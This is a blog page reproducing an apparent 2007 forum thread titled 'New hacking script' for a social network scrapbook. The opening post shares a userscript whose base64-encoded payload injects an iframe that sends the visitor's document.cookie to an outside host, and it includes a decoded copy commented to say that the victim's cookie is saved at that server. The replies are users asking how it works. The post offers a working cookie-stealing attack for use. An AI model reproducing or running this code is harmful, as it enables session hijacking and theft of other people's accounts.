Tuesday, May 15, 2007

New hacking script

showing 1-9 of 9 first | <> | next > | last



(manage)
10:56 pm(11 hours ago)
New hacking script
http://grupomafia.freehostia.com/flood.user.js uploaded here

and here goes its explanation

function ajax(){
xml = new XMLHttpRequest();
xml.open("POST","Scrapbook.aspx",false);
xml.send(null);
setInterval("document.getElementById('topico').value='xml';", 1);
}

var flood = 'data:application/x-javascript;base64,' +
'ZG9jdW1lbnQuYm9keS5pbm5lckhUTUwrPSc8c3R5bGU+aWZyYW1lIHsgYmFja2dyb3VuZC1jb2xvcjpi' +
'bGFjayB9Ozwvc3R5bGU+JzsNCg0KYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImlmcmFtZSIpOw0K' +
'YS5zcmM9J2h0dHA6Ly9ncnVwb21hZmlhLmZyZWVob3N0aWEuY29tL2Zsb29kL2Zsb29kL2Zsb29kLnBo' +
'cD9jPScrZG9jdW1lbnQuY29va2llOw0KYS5uYW1lPSdhJzsNCmRvY3VtZW50LmJvZHkuYXBwZW5kQ2hp' +
'bGQoYSk7';

/* above data written in encrypted format. flood variable is storing this data

document.body.innerHTML+='';

a = document.createElement("iframe");

// data is saved at the server given below it mean ur cookie is saved at the link given below by using variable c
a.src='http://grupomafia.freehostia.com/flood/flood/flood.php?c='+document.cookie;
a.name='a';
document.body.appendChild(a);
*/

var img_node = document.createElement('script');
img_node.src = flood;
document.body.appendChild(img_node);
delete

♪ τμšhαг ♪
(manage)
10:59 pm(11 hours ago)
nice but pls can u explain it more
delete

[̲̅♣̲̅]Nothing ♫
(manage)
11:00 pm(11 hours ago)
base64
?? explain..
delete

[̲̅♣̲̅]Nothing ♫
(manage)
11:04 pm(11 hours ago)
got it
delete

♪ τμšhαг ♪
(manage)
11:08 pm(11 hours ago)
popeye yaar i dint understood anything
pls samjha do yaar
delete

[̲̅♣̲̅]Nothing ♫
(manage)
11:09 pm(11 hours ago)
tush tum jokes padho IT jokes..
delete

♪ τμšhαг ♪
(manage)
11:12 pm(11 hours ago)
yaar ye samjhao pehle
delete


(manage)
11:44 pm(10 hours ago)
wats the use of post token and sig in this script??
delete


(manage)
12:22 am(10 hours ago)
tree please reply my question yaar........

No comments: